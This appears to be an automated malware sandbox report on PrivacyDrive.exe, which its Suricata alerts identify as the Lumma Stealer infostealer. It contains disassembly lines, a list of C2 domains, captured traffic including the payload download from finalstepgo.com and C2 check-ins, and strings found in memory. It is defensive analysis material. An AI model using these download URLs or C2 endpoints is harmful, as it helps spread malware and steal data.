Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_05A5ED6D
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	19_2_05A34CB0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A58C90
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	19_2_05A4DCC2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_05A79C10
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	19_2_05A5BC50
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	19_2_05A5BC50
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_05A43FA9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	19_2_05A43FA9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_05A40F0F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	19_2_05A4AF50
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	19_2_05A43EA6
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A77E30
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	19_2_05A77E30
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then push ebx	19_2_05A4DE33
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A799B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_05A4399C
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	19_2_05A749F0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	19_2_05A56910
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A7A8B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_05A768B9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	19_2_05A6A880
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_05A62899
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_05A62899
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A6F8FA
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	19_2_05A6F8FA
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_05A62813
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_05A62813
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	19_2_05A73870
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_05A50BAC
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_05A56B80
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	19_2_05A62BC9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_05A62BC9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_05A62BC9
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A5DB75
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	19_2_05A3DAB0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	19_2_05A63AB3
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_05A45ADF
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	19_2_05A6EA30
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_05A50A01

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.17:54889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.17:49738 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.17:49739 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.17:49738 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.17:49738 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.17:49739 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.17:49739 -> 172.67.206.221:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abortinoiwiam.shop
Source: Malware configuration extractor	URLs: racedsuitreow.shop
Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: candleduseiwo.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop
Source: Malware configuration extractor	URLs: surroundeocw.shop

Source: global traffic

HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1Host: finalstepgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: finalstepgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finalstepgo.com/uploads/il2.txtAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2bKyk+phhzcxLy4&MD=VEcd6h4b HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCNy9zQEIkcrNAQi5ys0BCLbLzQEI6dLNAQiK080BCMHUzQEIz9bNAQjj1s0BCI7XzQEIp9jNAQi62M0BCPnA1BUYuL/NARj2yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCNy9zQEIkcrNAQi5ys0BCLbLzQEI6dLNAQiK080BCMHUzQEIz9bNAQjj1s0BCI7XzQEIp9jNAQi62M0BCPnA1BUYuL/NARj2yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Host: finalstepgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2bKyk+phhzcxLy4&MD=VEcd6h4b HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAc3b2YHaGqVpvDt5fQD5WqyWe6yFx0NJba5UkXc18NyzzO727EJpRxajMi/a9VJGG3IbazdVCfGYDhgWix1bEZvF%2Bdi6BQDemUJPwGpTbVYCsJTXlSnyGJ9pvzXtUVpRc7a/IucKShQdkeIn8vjlkWQ7B633Nt88ruPHqsBG61WOzjNulLatGW7xuEYlrxV%2BAnUId2LPnjd3yXu39dIiVTHguri5j1XBxEHqhB/8RgSnKKM62AL1clVhb53mRWM362Q6dIqt85fZg5KeStaKPrIBled%2BkdJUzvKkym95jria/PiUdNMSRul6lJW3pVWndWcGee1xmuRa5Mb/7VE1NgkQZgAAEIjN2Vud26lqrpa0nLDGu7mwATElC8QCEnO8xLw8TUG3E9an0zcpJWgBIfsWEMqk4oxdn3M93RNPyGW1AjlXb6Gn06SvkSvESnWEl8Wy3kp9o6ejpwFdKJjdrk7hP6ZPSOLYmQiiYo1%2B1tZ5fAIOIIKQ44iMjdOSTkgtIdAxzwOu8gVhNL6PiW374UhLKIejrg9C1J/Pkmhmmiqj6pH/r/epLtFJWif%2BwQX13KWyyPTH7OXyukCnKh%2B/FnJjMl/%2B/KRwLRgllZnqiDw8TNu6i7WVri08tW6uWwioHgIeW6KGw7y3T/GADdXA0p1jxGHBBTIX1HgpKfBxb9XY6ZjIGxtXtUiDCkGR97GpPTGKxse8/Zhyul1ICKaK6Xxc3jXPpqlUivMvW6hV/TZTk7RXJEhnAlKYwqAHpQ7BO77iekqC5o1BgoDVu1sSh12WSziYoXkSEDemQjLyNIGzZsnoVDCfuP7EFUhDMUH5GmAdL7YqGiLffNCrogzj9okNNDGCflw7%2BG3/zT5pAGW11JKD3TdgQy0PuP/OfzJ5yAYJClx168oHYvHzegIaXl4V%2BwcCy5LQhl7RxmWmRyj4M4UARQg64NcB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1727365298User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 2814152BF41F4137A196F50A19FC20E3X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B

Source: global traffic	DNS traffic detected: DNS query: finalstepgo.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: candleduseiwo.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 15:40:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: chromecache_138.1.dr	String found in binary or memory: http://www.broofa.com
Source: PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.privacy-drive.comx
Source: chromecache_141.1.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_141.1.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_138.1.dr, chromecache_141.1.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_141.1.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_141.1.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_141.1.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_141.1.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_137.1.dr	String found in binary or memory: https://finalstepgo.com/uploads/il222.zip
Source: chromecache_138.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_138.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_138.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_138.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_138.1.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_141.1.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_141.1.dr	String found in binary or memory: https://plus.googleapis.com
Source: PrivacyDrive.exe, 00000013.00000003.1972562223.000000000190A000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018B0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2001459062.000000000190E000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.0000000001896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/
Source: PrivacyDrive.exe, 00000013.00000003.1961859622.0000000001883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/_
Source: PrivacyDrive.exe, 00000013.00000003.1972562223.000000000190A000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018DA000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961859622.0000000001883000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2001459062.000000000190E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: PrivacyDrive.exe, 00000013.00000003.1961859622.0000000001883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api4
Source: PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api6
Source: PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apib
Source: PrivacyDrive.exe, 00000013.00000003.1972562223.000000000190A000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2001459062.000000000190E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/w
Source: chromecache_141.1.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
